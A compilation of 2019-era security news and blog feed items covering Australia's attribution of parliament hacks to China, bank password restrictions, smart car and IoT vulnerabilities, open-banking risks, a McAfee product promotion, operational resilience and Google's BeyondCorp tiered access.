Pentest secures contract with global techn corp, Xcina Consulting becomes preferred supplier

Shearwater Group, the organizational resilience group, announces that its group company, Pentest has secured a one-year contract with a global technology corporation worth in excess of US$1 million. At the same time, Xcina Consulting, another Shearwater group company has also signed a ‘Master Consulting Agreement’ and become a preferred supplier to the same organization. Under the terms of the contract, Pentest will deliver a framework for the provision of vulnerability assessment and penetration testing services … More

The post Pentest secures contract with global techn corp, Xcina Consulting becomes preferred supplier appeared first on Help Net Security.

Executive Director Q&A: PCI SSC Strategic Framework


In his keynote presentation at the 2019 PCI Community Meeting this week in Vancouver, Executive Director Lance Johnson introduced the Strategic Framework that is guiding PCI SSC activities to achieve its mission and support the needs of the global payments industry. In this interview, we cover key questions about the framework and how it’s shaping the Council’s priorities.

Australia is confident that China was behind attack on parliament, political parties

Australia ‘s intelligence is sure that China is behind the cyberattacks that hit its parliament and political parties, but decided to not publicly accuse it.

According to the Reuters agency, Australia’s intelligence has evidence that the attacks that hit its parliament and political parties were orchestrated by China. Anyway the Australian government decided to not publicly accuse it to preserve trade relations with Beijing.

Reuters cited five sources within the Australian intelligence that attributed the attacks on its national parliament and three largest political parties before the general election in May to China-linked hackers.

“Australia’s cyber intelligence agency – the Australian Signals Directorate (ASD) – concluded in March that China’s Ministry of State Security was responsible for the attack, the five people with direct knowledge of the findings of the investigation told Reuters.” reported the Reuters.

“The report, which also included input from the Department of Foreign Affairs, recommended keeping the findings secret in order to avoid disrupting trade relations with Beijing, two of the people said.”

Australia Australian National University hack australian parliament house

Australia disclosed the attacks in February, at the time experts speculated the involvement of a nation-date actor without attributed the attacks to a specific threat actor.

China is Australia’s biggest trading partner and its not surprising that its government gathers intelligence on it. Beijing denied any involvement in the attacks and China’s Foreign Ministry pointed out that his country is also the target of numerous attacks.

“When investigating and determining the nature of online incidents there must be full proof of the facts, otherwise it’s just creating rumors and smearing others, pinning labels on people indiscriminately. We would like to stress that China is also a victim of internet attacks,” the Ministry told the Reuters.

“China hopes that Australia can meet China halfway, and do more to benefit mutual trust and cooperation between the two countries.”

When the Australian authorities discovered the attacks, the IT staff forced a password reset to every person working at the parliament.

According to information collected by Reuters, the hackers did access private emails and policy paper from members of the Liberal, National and Labor parties.

Australian experts shared their findings with the United States and the United Kingdom, the latter sent a team of cyber experts to Canberra to help investigate the attack.

“Australian investigators found the attacker used code and techniques known to have been used by China in the past, according to the two sources.” concludes the Reuters. “Australian investigators found the attacker used code and techniques known to have been used by China in the past, according to the two sources.”

Pierluigi Paganini

(SecurityAffairs – Australia, hacking)

The post Australia is confident that China was behind attack on parliament, political parties appeared first on Security Affairs.

Public WiFi Networks: Potential risks and how to work around them

Public WiFi Networks: Potential risks and how to work around them Public WiFi Networks: Potential risks and how to work around them: Chances are that most people get excited when they see their device prompting to connect to public Wi-Fi when they visit a common area like a restaurant, cafe, an airport or even certain ... Read morePublic WiFi Networks: Potential risks and how to work around them

The post Public WiFi Networks: Potential risks and how to work around them appeared first on HackingVision.

Banks, Arbitrary Password Restrictions and Why They Don’t Matter

Banks, Arbitrary Password Restrictions and Why They Don't Matter

Allow me to be controversial for a moment: arbitrary password restrictions on banks such as short max lengths and disallowed characters don't matter. Also, allow me to argue with myself for a moment: banks shouldn't have these restrictions in place anyway.

I want to put forward cases for both arguments here because seeing both sides is important. I want to help shed some light on why this practice happens and argue pragmatically both for and against. But firstly, let's just establish what's happening:

People are Upset About Arbitrary Restrictions

This is actually one of those long-in-draft blog posts I finally decided to finish after seeing this tweet earlier on in the week:

It feels wrong because 5 digits presents an extremely limited set of different possible combinations the password can be. (There's something a little off with the maths here though - 5 digits would only provide 100k permutations whereas 5 characters would provide more in the order of 1.5B.)

That said, Westpac down in Australia certainly appears to be 6 characters:

Which puts us well north of a billion possibilities again. Want more? CommBank will give you 16 characters:

On the one hand, it's a damn sight more generous than the previous two banks yet on the other hand, why? And while I'm here questioning CommBank's logic, what the hell is going on with this:

Banks, Arbitrary Password Restrictions and Why They Don't Matter

1Password has an open letter to banks on precisely this because its awful advice steeped in legacy misunderstandings of both technology and human brains. That open letter is often used as a reference to persuade banks to lift their game:

So on the surface of it, the whole thing looks like a bit of a mess. But it's not necessarily that bad, and here's why:

Password Limits on Banks Don't Matter

That very first tweet touched on the first reason why it doesn't matter: banks aggressively lock out accounts being brute forced. They have to because there's money at stake and once you have a financial motivator, the value of an account takeover goes up and consequently, so does the incentive to have a red hot go at it. Yes, a 5-digit PIN only gives you 100k attempts, but you're only allowed two mistakes. Arguably you could whittle that 100k "possibilities" down to a much smaller number of "likely" passwords either by recognising common patterns or finding previously used passwords by the intended victim, but as an attacker you're going to get very few bites at that cherry:

Next up is the need to know the target's username. Banks typically use customer registration numbers as opposed to user-chosen usernames or email addresses so there goes the value in credential stuffing lists. That's not to say there aren't ways of discovering someone's banking username, but it's a significantly higher barrier to entry than the typical "spray and pray" account takeover attempts.

Then there's the authentication process itself and it reminds me of a discussion I had with a bank's CISO during a recent workshop. I'd just spent two days with his dev team hacking themselves first and I raised the bollocking they were getting on social media due a new password policy along the lines of those in the tweets you see above. He turned to me and said, "Do you really think the only thing the bank does to log people on is to check the username and password?" Banks are way more sophisticated than this and it goes well beyond merely string-matching credentials; there's all sorts of other environment, behavioural and heuristic patterns used to establish legitimacy. You won't ever see a bank telling you how they do it, but those "hidden security features" make a significant contribution to the bank's security posture:

Then there's the increasing propensity for banks to implement additional verification processes at key stages of managing your money. For example, one of the banks I regularly use sends me a challenge via SMS whenever setting up a new payee. Obviously, SMS has its own challenges, but what we're talking about now is not just needing to successfully authenticate to the bank, but also to prove control of a phone number at a key stage and that will always be more secure than authentication alone.

And if all of this fails? Banks like ING will give you your money bank:

Now, compare all this to logging on to catforum.com:

Banks, Arbitrary Password Restrictions and Why They Don't Matter

How much sophistication do you think is behind those username and password fields in that vBulletin forum? Exactly, it's basic string-matching and this is really the point: judging banks by the same measures we judge basic authentication schemes is an apples and oranges comparison.

However, I disagree with banks taking this approach so let me now go and argue from the other side of the fence.

Banks Shouldn't Impose Password Limits

There are very few independent means by which we can assess a website's security posture in a non-invasive fashion. We can look for the padlock and the presence of HTTPS (which is increasingly ubiquitous anyway) and we look at the way in which they allow you to create and use passwords. There are few remaining measures of substance we can observe without starting to poke away at things.

So what opinion do you think people will form when they see arbitrary complexity rules or short limits? Not a very positive one and there are the inevitable conclusions drawn:

Hey [bank], does that 16 character limit mean you've got a varchar(16) column somewhere and you're storing passwords as plain text?

As much as I don't believe that's the case in any modern bank of significance, it's definitely not a good look. Inevitably the root cause in situations like this is "legacy" - there's some great hulking back-end banking solution the modern front-end needs to play nice with and the decisions of yesteryear are bubbling up to the surface. It's a reason, granted, but it's not a very good one for any organisation willing to make an investment to evolve things.

But beyond just the image problem, there's also a functional problem with arbitrarily low password limits:

I've been through this myself in the past and I vividly recall creating a new PayPal password with 1Password only to find the one in my password manager had been truncated on the PayPal side and I was now locked out of my account. This is just unnecessary friction.

Summary

So wrapping it all up in reverse order, arbitrary low limits on length and character composition are bad. They look bad, they lead to negative speculation about security posture and they break tools like password managers.

But would I stop using a bank (as I've seen suggested in the past) solely due to their password policy? No, because authentication in this sector (and the other security controls that often accompany it) go far beyond just string-matching credentials.

Let's keep pushing banks to do better, but not lose our minds about it in the process.

YouTube’s fine and child safety online | Letters

Fining YouTube for targeting adverts at children as if they were adults shows progress is being made on both sides of the Atlantic, writes Steve Wood of the Information Commissioner’s Office

The conclusion of the Federal Trade Commission investigation into YouTube’s gathering of young people’s personal information (‘Woeful’ YouTube fine for child data breach, 5 September) shows progress is being made on both sides of the Atlantic towards a more children-friendly internet. The company was accused of treating younger users’ data in the same way it treats adult users’ data.

YouTube’s journey sounds similar to many other online services: it began targeting adults, found more and more children were using its service, and so continued to take commercial advantage of that. But the allegation is it didn’t treat those young people differently, gathering their data and using it to target content and adverts at them as though they were adult users.

Continue reading...

Solving the Gamer’s Dilemma: Security vs. Performance

As of last year, 2.2 billion1 people consider themselves gamers across the globe. Of that 2.2 billion, over 50% – 1.22 billion2 – play their game of choice on a PC. The sheer number of PC gamers throughout the world, however, has sparked the interest of cybercriminals and cyberthreats targeting gamers have spiked. Threats including malware, potentially unwanted programs (PUPs), phishing, account takeovers (ATO), and more have slowly started to permeate gamers’ domains at an alarming level.

PC gamers often adopt lesser security protocols, as they’re concerned about the potential negative impact on in-game performance. At the same time, they are the most connected, online users, meaning their exposure to threats is generally higher. While they recognize and understand the importance of having cybersecurity, they do not want to sacrifice performance for security. The gamer’s dilemma – security versus performance – is the crux as to why gamers put security second, even though the average gamer has experienced almost five cyberattacks.

There’s good news though – McAfee Gamer Security is here to counter the notion that antivirus slows gamers down. This brand-new security solution from McAfee provides gamers with the security they need without sacrificing performance or creating in-game slowdowns, such as drops in frames per second (FPS) and lag. Built from the ground up, this solution delivers performance optimization by monitoring key system metrics coupled with the ability to manually kill resource hogs on-the-fly, while automatically prioritizing resources and pausing background services. McAfee Gamer Security also features cloud-based MicroAV, which offloads detection from the system to the cloud for all the protection gamers could want or need, without the “bloat” that usually accompanies security software.

While McAfee Gamer Security is now available for purchase, in spring 2019 McAfee surveyed users that participated in beta testing. Here’s how they responded to a few questions we asked:

Overall, what impact, if any, did you feel in your gaming experience?

“I believe I had [experienced] a positive impact of the software during my overall use of the program because it increased the speed of my game as well as gave me peace of mind that I…[stayed] protected during my gameplay.”

What one benefit would make you talk about McAfee Gamer Security to your friends? What is the primary reason for your choice? 

“Good security which doesn’t slow down my system; Normally, antiviruses…hog background resources [and] you trade performance for security. McAfee Gamer Security offers the best of both worlds, without contradicting each other.”

Overall, how useful or not useful has Gamer Security been?                      

“Every couple [of] hours or so while gaming, I…used the software to check up on my RAM/GPU/CPU performance and make sure my system isn’t bottlenecking, there aren’t any irregularities, etc. I also really like that I can experience a boost in my gameplay without having to take the risk of overclocking my components.”

In addition to using a security solution like McAfee Gamer Security, here are some other general tips to help you stay secure while playing your favorite video game:

  1. Ensure all applications, hardware and software are up-to-date. Cybercriminals can take advantage of software, hardware, and application vulnerabilities to spread cyberthreats, such as malware. Keep your devices and applications updated with the latest security patches and fixes to help combat this threat.
  2. Periodically visit your device to add/remove programs. Some apps on your device may be vampirically siphoning in-game performance. Remove apps that you do not need or no longer use.
  3. Create strong, unique passwords. Over 55% of gamers re-use the same password across accounts for online gaming services. And while it might be easier to remember the same password, reusing credentials across multiple accounts could put the hundreds, or even thousands, of invested hours in leveling up characters and gathering rare items at risk in the event one account is breached. Be sure to construct a complex password that is difficult to guess.

And, as always, stay on top of the latest consumer and gaming security threats with @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

Footnotes

  1. Number of active video gamers worldwide from 2014 to 2021 (in millions), Statista, 2019
  2. Number of active PC gamers worldwide from 2014 to 2021 (in millions), Statista, 2019

The post Solving the Gamer’s Dilemma: Security vs. Performance appeared first on McAfee Blogs.

New Banking Regs Increase Cyber-Attack Risk

New Banking Regs Increase Cyber-Attack Risk

report released today by Trend Micro has found that new European open-banking rules could leave financial services organizations and their customers more susceptible to cyber-attacks.

The European Union’s Revised Payment Services Directive (PSD2) is designed to give users greater control over their financial data and the option to carry out open banking via a new breed of innovative fintech firms. According to Trend Micro's research, that increased control could come at a heavy cost. 

Vulnerabilities that could be exploited as a result of the EU's PSD2 include public APIs that allow approved third parties to access users' banking data and mobile apps that contain transactional data that could make users targets for phishing attacks.

Another concern raised by the report pertained to financial technology (fintech) firms that have no record on data protection and lack the resources of big banks.

In a quick survey of open-banking fintechs, Trend Micro found them to have an average of 20 employees and no dedicated security professionals. The report suggests that such setups make these fintechs ideal targets for attackers and raise concerns over security gaps in their mobile apps, APIs, data-sharing techniques, and security modules that could be incorrectly implemented.

Bharat Mistry, principal security strategist at Trend Micro, told Infosecurity Magazine: "The worst-case scenario here is that cyber-criminals could very easily develop malicious fake apps, especially for mobile smartphone devices where the App Store provider hasn’t taken sufficient measures to validate the source of the application. Then, using phishing campaigns, hackers could direct users to download and use malicious apps, thereby exposing banking credentials to prying eyes."

Open banking comes with the additional challenge of how and to whom blame should be ascribed when cybercrimes do inevitably occur.   

Mistry said: "Another aspect of this evolving open-banking world is the increasing complexity of proving responsibility when a fraudulent transaction occurs. The fault can potentially lie with the bank, the user, or the third-party provider; how smoothly will communication between these three parties go to resolve any such incident?"

Wherever the blame may lie, Mistry expects customers of financial services providers will expect their providers to shoulder the responsibility of maintaining cybersecurity. 

He said: "Cyber insurance is proving to be popular with organizations who want to offset their cyber liabilities; unfortunately, I cannot see individuals taking out such policies as most people are reluctant to pay for something that they think the service provider or bank should be taking care of."

Keeping Your Vehicle Secure Against Smart Car Hacks

Reading Time: ~ 3 min.

An unfortunate reality of all smart devices is that, the smarter they get, and the more integrated into our lives they become, the more devastating a security breach can be. Smart cars are no exception. On the contrary, they come with their own specific set of vulnerabilities. Following high-profile incidents like the infamous Jeep hack, it’s more important than ever that smart car owners familiarize themselves with their inherent vulnerabilities. It may even save lives.

Want smart device shopping tips? Make sure your security isn’t sacrificed for convenience.

Smart Car Vulnerabilities

At a recent hacking competition, two competitors were able to exploit a flaw in the Tesla Model 3 browser system and compromise the car’s firmware. While the reported “Tesla hack” made waves in the industry, it actually isn’t even one of the most common vulnerabilities smart car owners should look out for. These, easier to exploit, vulnerabilities may be more relevant to the average owner.

Car alarms, particularly aftermarket car alarms, are one of the largest culprits in smart car security breaches. A recent study found that at least three million vehicles are currently at risk due to insecure smart alarms. By exploiting insecure direct object reference (IDORS) issues within the alarm’s software, hackers can track the vehicle’s GPS location, disable the alarm, unlock doors, and in some cases even kill the engine while it is being used.

Key fobs are often used by hackers to gain physical access to a vehicle. By using a relay attack, criminals are able to capture a key fob’s specific signal with an RFID receiver and use it to unlock the car. This high-tech version of a duplicate key comes with a decidedly low-tech solution: Covering your key fob in aluminum foil will prevent the signal from being skimmed.

On-Board diagnostic ports are legally required for all vehicles manufactured after 1996 in the United States. Traditionally used by mechanics, the on-board diagnostics-II (OBD-II) port allows direct communication with your vehicle’s computer. Because the OBD-II port bypasses all security measures to provide direct access to the vehicle’s computer for maintenance, it provides particularly tempting backdoor access for hackers.

Protecting Your Smart Car from a Cybersecurity Breach

Precautions should always be taken after buying a new smart device, and a smart car is no exception. Here are the best ways to protect your family from a smart car hack.

Update your car’s firmware and keep it that way. Do not skip an update because you don’t think it’s important or it will take too much time. Car manufacturers are constantly testing and updating vehicle software systems to keep their customers safe—and their brand name out of the news. Signing up for vehicle manufacturer recalls and software patches will help you stay on top of these updates.

Disable unused smart services. Any and all of your car’s connectivity ports that you do not use should be turned off, if not altogether disabled. This means that if you don’t use your car’s Bluetooth connectivity, deactivate it. Removing these access points will make your car less exposed to hacks.

Don’t be a beta tester. We all want the newest and hottest technologies, but that doesn’t keep us at our most secure. Make sure that you’re purchasing a vehicle with technology that has been field tested for a few years, allowing time for any vulnerabilities to be exposed. Cutting-edge technologies are good. But bleeding edge? Not so much.

Ask questions when buying your vehicle and don’t be afraid to get technical. Ask the dealer or manufacturer which systems can be operated remotely, which features are networked together, and how those gateways are secured. If you’re not comfortable with the answers, take your money elsewhere.

Advocate for your security. As smart cars become so smart that they begin to drive themselves, consumers must demand that manufacturers provide better security for autonomous and semi-autonomous vehicles.

Only use a trusted mechanic and be mindful of who you grant access to your car. OBD-II ports are vulnerable but necessary, so skipping the valet may save you a costly automotive headache down the line.

Keep the Conversation Going

As our cars get smarter, their vulnerabilities will change. Check back here to keep yourself updated on the newest trends in smart car technologies, and stay ahead of any potential threats.


The post Keeping Your Vehicle Secure Against Smart Car Hacks appeared first on Webroot Blog.

Vulnerabilities in IoT Devices Have Doubled Since 2013

Vulnerabilities in IoT Devices Have Doubled Since 2013

A follow-up study into the security of IoT devices has revealed more than twice the number of vulnerabilities as were detected six years ago. 

In the 2013 study SOHOpelessly Broken 1.0, researchers at Independent Security Evaluators (ISE) highlighted 52 vulnerabilities across 13 SOHO wireless routers and network-attached storage (NAS) devices made by vendors including Asus and Belkin.

An examination of routers and NAS products by ISE published yesterday has flagged 125 common vulnerabilities or exposures (CVEs). The vulnerabilities captured by the new research, dubbed SOHOpelessly Broken 2.0, could affect millions of IoT devices.

For their latest study, ISE tested 13 contemporary IoT devices created by a range of manufacturers. Modern versions of several devices tested in the original 2013 study were also studied to determine whether manufacturers had upped their security game.

The results were fairly disappointing, with researchers able to obtain remote root-level access to 12 of the 13 devices tested. Among the weaknesses identified were buffer overflow issues, command injection security flaws, and cross-site scripting (XSS) errors.

"We were expecting to find issues in the devices; however, the number and severity of the issues exceeded those expectations. Our first reaction to a lot of our findings was: 'It can't really be this easy, right?'" said ISE researcher Joshua Meyer. 

Conducting the study has changed how Meyer uses IoT devices. He said: "I will be more selective of any IoT devices I purchase for personal use. I am also more aware of the features provided by my devices and disable all of the ones that aren't necessary to its security."

After completing the study, ISE sent vulnerability reports and proof-of-concept (PoC) codes to affected vendors. While the majority of companies acknowledged the reports, TOTOLINK and Buffalo have not yet responded.  

"Netgear and Drobo only responded to us after we continuously messaged them about the critical security issues in their products," said Rick Ramgattie, lead researcher at ISE.

Asked if any plans were afoot for a SOHOpelessly Broken 3.0, Ramgattie said the team is looking into starting a new IoT/Embedded Device research project mid-2020.

Ramgattie elaborated: "We aren't sure if it is going to be the same format as SOHO 1.0 and SOHO 2.0. We might mix things up and pick a smaller set of manufacturers and narrow in on new attack surfaces we have been wanting to dive into for a long time. 

"We might also research more enterprise devices, different protocols, and more complex data-processing workflows."

Banks, Arbitrary Password Restrictions and Why They Don’t Matter

Banks, Arbitrary Password Restrictions and Why They Don't Matter

Allow me to be controversial for a moment: arbitrary password restrictions on banks such as short max lengths and disallowed characters don't matter. Also, allow me to argue with myself for a moment: banks shouldn't have these restrictions in place anyway.

I want to put forward cases for both arguments here because seeing both sides is important. I want to help shed some light on why this practice happens and argue pragmatically both for and against. But firstly, let's just establish what's happening:

People are Upset About Arbitrary Restrictions

This is actually one of those long-in-draft blog posts I finally decided to finish after seeing this tweet earlier on in the week:

It feels wrong because 5 digits presents an extremely limited set of different possible combinations the password can be. (There's something a little off with the maths here though - 5 digits would only provide 100k permutations whereas 5 characters would provide more in the order of 1.5B.)

That said, Westpac down in Australia certainly appears to be 6 characters:

Which puts us well north of a billion possibilities again. Want more? CommBank will give you 16 characters:

On the one hand, it's a damn sight more generous than the previous two banks yet on the other hand, why? And while I'm here questioning CommBank's logic, what the hell is going on with this:

Banks, Arbitrary Password Restrictions and Why They Don't Matter

1Password has an open letter to banks on precisely this because its awful advice steeped in legacy misunderstandings of both technology and human brains. That open letter is often used as a reference to persuade banks to lift their game:

So on the surface of it, the whole thing looks like a bit of a mess. But it's not necessarily that bad, and here's why:

Password Limits on Banks Don't Matter

That very first tweet touched on the first reason why it doesn't matter: banks aggressively lock out accounts being brute forced. They have to because there's money at stake and once you have a financial motivator, the value of an account takeover goes up and consequently, so does the incentive to have a red hot go at it. Yes, a 5-digit PIN only gives you 100k attempts, but you're only allowed two mistakes. Arguably you could whittle that 100k "possibilities" down to a much smaller number of "likely" passwords either by recognising common patterns or finding previously used passwords by the intended victim, but as an attacker you're going to get very few bites at that cherry:

Next up is the need to know the target's username. Banks typically use customer registration numbers as opposed to user-chosen usernames or email addresses so there goes the value in credential stuffing lists. That's not to say there aren't ways of discovering someone's banking username, but it's a significantly higher barrier to entry than the typical "spray and pray" account takeover attempts.

Then there's the authentication process itself and it reminds me of a discussion I had with a bank's CISO during a recent workshop. I'd just spent two days with his dev team hacking themselves first and I raised the bollocking they were getting on social media due a new password policy along the lines of those in the tweets you see above. He turned to me and said, "Do you really think the only thing the bank does to log people on is to check the username and password?" Banks are way more sophisticated than this and it goes well beyond merely string-matching credentials; there's all sorts of other environment, behavioural and heuristic patterns used to establish legitimacy. You won't ever see a bank telling you how they do it, but those "hidden security features" make a significant contribution to the bank's security posture:

Then there's the increasing propensity for banks to implement additional verification processes at key stages of managing your money. For example, one of the banks I regularly use sends me a challenge via SMS whenever setting up a new payee. Obviously, SMS has its own challenges, but what we're talking about now is not just needing to successfully authenticate to the bank, but also to prove control of a phone number at a key stage and that will always be more secure than authentication alone.

And if all of this fails? Banks like ING will give you your money bank:

Now, compare all this to logging on to catforum.com:

Banks, Arbitrary Password Restrictions and Why They Don't Matter

How much sophistication do you think is behind those username and password fields in that vBulletin forum? Exactly, it's basic string-matching and this is really the point: judging banks by the same measures we judge basic authentication schemes is an apples and oranges comparison.

However, I disagree with banks taking this approach so let me now go and argue from the other side of the fence.

Banks Shouldn't Impose Password Limits

There are very few independent means by which we can assess a website's security posture in a non-invasive fashion. We can look for the padlock and the presence of HTTPS (which is increasingly ubiquitous anyway) and we look at the way in which they allow you to create and use passwords. There are few remaining measures of substance we can observe without starting to poke away at things.

So what opinion do you think people will form when they see arbitrary complexity rules or short limits? Not a very positive one and there are the inevitable conclusions drawn:

Hey [bank], does that 16 character limit mean you've got a varchar(16) column somewhere and you're storing passwords as plain text?

As much as I don't believe that's the case in any modern bank of significance, it's definitely not a good look. Inevitably the root cause in situations like this is "legacy" - there's some great hulking back-end banking solution the modern front-end needs to play nice with and the decisions of yesteryear are bubbling up to the surface. It's a reason, granted, but it's not a very good one for any organisation willing to make an investment to evolve things.

But beyond just the image problem, there's also a functional problem with arbitrarily low password limits:

I've been through this myself in the past and I vividly recall creating a new PayPal password with 1Password only to find the one in my password manager had been truncated on the PayPal side and I was now locked out of my account. This is just unnecessary friction.

Summary

So wrapping it all up in reverse order, arbitrary low limits on length and character composition are bad. They look bad, they lead to negative speculation about security posture and they break tools like password managers.

But would I stop using a bank (as I've seen suggested in the past) solely due to their password policy? No, because authentication in this sector (and the other security controls that often accompany it) go far beyond just string-matching credentials.

Let's keep pushing banks to do better, but not lose our minds about it in the process.

Operational resilience begins with your commitment to and investment in cyber resilience

Operational resilience cannot be achieved without a true commitment to and investment in cyber resilience. Global organizations need to reach the state where their core operations and services won’t be disrupted by geopolitical or socioeconomic events, natural disasters, and cyber events if they are to weather such events.

To help increase stability and lessen the impact to their citizens, an increasing number of government entities have drafted regulations requiring the largest organizations to achieve a true state of operational resilience: where both individual organizations and their industry absorb and adapt to shocks, rather than contributing to them. There are many phenomena that have led to this increased governance, including high-profile cyberattacks like NotPetya, WannaCrypt, and the proliferation of ransomware.

The rise in nation state and cybercrime attacks focusing on critical infrastructure and financial sectors, and the rapid growth of tech innovation pervading more and more industries, join an alarming increase in severe natural disasters, an unstable global geopolitical environment, and global financial market instability on the list of threats organizations should prepare for.

Potential impact of cybercrime attacks

Taken individually, any of these events can cripple critical business and government operations. A lightning strike this summer caused the UK’s National Grid to suffer the biggest blackout in decades. It affected homes across the country, shut down traffic signals, and closed some of the busiest train stations in the middle of the Friday evening rush hour. With trains needing to be manually rebooted, the rhythm of everyday work life was disrupted. The impact of cybercrime attacks can be as significant, and often longer term.

NotPetya cost businesses more than $10 billion; pharmaceutical giant Merck put its bill at $870 million alone. For more than a week, the malware shut down cranes and security gates at Maersk shipping terminals, as well as most of the company’s IT network—from the booking site to systems handling cargo manifests. It took two months to rebuild all the software systems, and three months before all cargo in transit was tracked down—with recovery dependent on a single server having been accidently offline during the attack due to the power being cut off.

The combination of all these threats will cause disruption to businesses and government services on a scale that hasn’t been seen before. Cyber events will also undermine the ability to respond to other types of events, so they need to be treated holistically as part of planning and response.

Extending operational resiliency to cover your cybersecurity program should not mean applying different principles to attacks, outages, and third-party failures than you would to physical attacks and natural hazards. In all cases, the emphasis is on having plans in place to deliver essential services whatever the cause of the disruption. Organizations are responding by rushing to purchase cyber-insurance policies and increasing their spending on cybersecurity. I encourage them to take a step back and have a critical understanding of what those policies actually cover, and to target the investment, so the approach supports operational resilience.

As we continue to witness an unparalleled increase in cyber-related attacks, we should take note that a large majority of the attacks have many factors in common. At Microsoft, we’ve written at length on the controls that best position an organization to defend against and respond to a cyber event.

We must not stand still

The adversary is innovating and accelerating. We must continue to be vigilant and thorough in both security posture, which must be based on “defense in depth,” and in sophistication of response.

The cost of data breaches continues to rise; the global average cost of a data breach is $3.92 million according to the 2019 Ponemon Institute report. This is up 1.5 percent from 2018 and 12 percent higher than in 2014. These continually rising costs have helped galvanize global entities around the topic of operational resilience.

The Bank of England, in July 2018, published comprehensive guidelines on operational resilience that set a robust standard for rigorous controls across all key areas: technology, legal, communications, financial solvency, business continuity, redundancy, failover, governmental, and customer impact, as well as full understanding of what systems and processes underlie your business products and services.

This paper leaves very few stones unturned and includes a clear statement of my thesis—dealing with cyber risk is an important element of operational resilience and you cannot achieve operational resilience without achieving cyber resilience.

Imagine for a moment that your entire network, including all your backups, is impacted by a cyberattack, and you cannot complete even a single customer banking transaction. That’s only one target; it’s not hard to extrapolate from here to attacks that shut down stock trades, real estate transactions, fund transfers, even to attacks on critical infrastructure like healthcare, energy, water system operators. In the event of a major attack, all these essential services will be unavailable until IT systems are restored to at least a baseline of operations.

It doesn’t require professional cybersecurity expertise to understand the impact of shutting down critical services, which is why the new paradigm for cybersecurity must begin not with regulations but with a program to build cyber resilience. The long list of public, wide-reaching cyberattacks where the companies were compliant with required regulations, but still were breached, demonstrates why we can no longer afford to use regulatory requirements as the ultimate driver of cybersecurity.

While it will always be necessary to be fully compliant with regulations like GDPR, SOX, HIPAA, MAS, regional banking regulators, and any others that might be relevant to your industry, it simply isn’t sufficient for a mature cyber program to use this compliance as the only standard. Organizations must build a program that incorporates defense in depth and implements fundamental security controls like MFA, encryption, network segmentation, patching, and isolation and reduction of exceptions. We also must consider how our operations will continue after a catastrophic cyberattack and build systems that can both withstand attack and be instantaneously resilient even during such an attack. The Bank of England uses the mnemonic WAR: for withstand, absorb, recover.

The ability to do something as simple as restoring from recent backups will be tested in every ransomware attack, and many organizations will fail this test—not because they are not backing up their systems, but because they haven’t tested the quality of their backup procedures or practiced for a cyber event. Training is not enough. Operational resilience guidelines call for demonstrating that you have concrete measures in place to deliver resilient services and that both incident management and contingency plans have been tested. You’ll need to invest in scenario planning, tabletop exercises and red/blue team exercises that prove the rigor of your threat modeling and give practice in recovering from catastrophic cyber events.

Importance of a cyber recovery plan

Imagine, if you will, how negligent it would be for your organization to never plan and prepare for a natural disaster. A cyber event is the equivalent: the same physical, legal, operational, technological, human, and communication standards must apply to preparation, response, and recovery. We should all consider it negligence if we do not have a cyber recovery plan in place. Yet, while the majority of firms have a disaster recovery plan on paper, nearly a quarter never test that and only 42 percent of global executives are confident their organization could recover from a major cyber event without it affecting their business.

Cybersecurity often focuses on defending against specific threats and vulnerabilities to mitigate cyber risk, but cyber resilience requires a more strategic and holistic view of what could go wrong and how your organization will address it as whole. The cyber events you’ll face are real threats, and preparing for them must be treated like any other form of continuity and disaster recovery. The challenges to building operational resilience have become more intense in an increasingly hostile cyber environment, and this preparation is a topic we will continue to address.

Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Operational resilience begins with your commitment to and investment in cyber resilience appeared first on Microsoft Security.

How Google adopted BeyondCorp: Part 3 (tiered access)




Intro 

This is the third post in a series of four, in which we set out to revisit various BeyondCorp topics and share lessons that were learnt along the internal implementation path at Google.

The first post in this series focused on providing necessary context for how Google adopted BeyondCorp, Google’s implementation of the zero trust security model. The second post focused on managing devices - how we decide whether or not a device should be trusted and why that distinction is necessary. This post introduces the concept of tiered access, its importance, how we implemented it, and how we addressed associated troubleshooting challenges.

High level architecture for BeyondCorp

What is Tiered Access?

In a traditional client certificate system, certificates are only given to trusted devices. Google used this approach initially as it dramatically simplified device trust. With such a system, any device with a valid certificate can be trusted. At predefined intervals, clients prove they can be trusted and a new certificate is issued. It’s typically a lightweight process and many off-the-shelf products exist to implement flows that adhere to this principle.

However, there are a number of challenges with this setup:
  • Not all devices need the same level of security hardening (e.g. non-standard issue devices, older platforms required for testing, BYOD, etc.).
  • These systems don’t easily allow for nuanced access based on shifting security posture.
  • These systems tend to evaluate a device based on a single set of criteria, regardless of whether devices require access to highly sensitive data (e.g. corporate financials) or far less sensitive data (e.g. a dashboard displayed in a public space).
The next challenge introduced by traditional systems is the inherent requirement that a device must meet your security requirements before it can get a certificate. This sounds reasonable on paper, but it unfortunately means that existing certificate infrastructure can’t be used to aid device provisioning. This implies you must have an additional infrastructure to bootstrap a device into a trusted state.

The most significant challenge is the large amount of time in between trust evaluations. If you only install a new certificate once a year, this means it might take an entire year before you are able to recertify a device. Therefore, any new requirements you wish to add to the fleet may take up to a year before they are fully in effect. On the other hand, if you require certificates to be installed monthly or daily, you have placed a significant burden on your users and/or support staff, as they are forced to go through the certification issuance process far more often, which can be time consuming and frustrating. Additionally, if a device is found to be out of compliance with security policy, the only option is to remove all access by revoking the certificate, rather than degrading access, which can create a frustrating all-or-nothing situation for the user.

Tiered access attempts to address all these challenges, which is why we decided to adopt it. In this new model, certificates are simply used to provide the device’s identity, instead of acting as proof of trust. Trust decisions are then made by a separate system which can be modified without interfering with the certificate issuance process or validity. Moving the trust evaluation out-of-band from the certificate issuance allows us to circumvent the challenges identified above in the traditional system. Below are three ways in which tiered access helps address these concerns.

Different access levels for different security states

By separating trust from identity, we can define infinite levels of trust, if we so desired. At any point in time, we can define a new trust level, or adjust existing trust level requirements, and reevaluate a device's compliance. This is the heart of the tiered access system. It provides us the flexibility to define different device trust criteria for low sensitivity applications from those used for high trusted applications.

Solving the bootstrapping challenge

Multiple trust states enable us to use the system to initiate an OS installation. We can now allow access to bootstrapping (configuration and patch management) services based solely on whether we own the device. This enables provisioning to occur from untrusted networks allowing us to replace the traditional IP-based checks.



Configurable frequency of trust evaluations


The frequency of device trust evaluation is independent from certificate issuance in a tiered access setup. This means you can evaluate trust as often as you feel necessary. Changes to trust definitions can be immediately reflected across the entire fleet. Changes to device posture can similarly immediately impact trust.

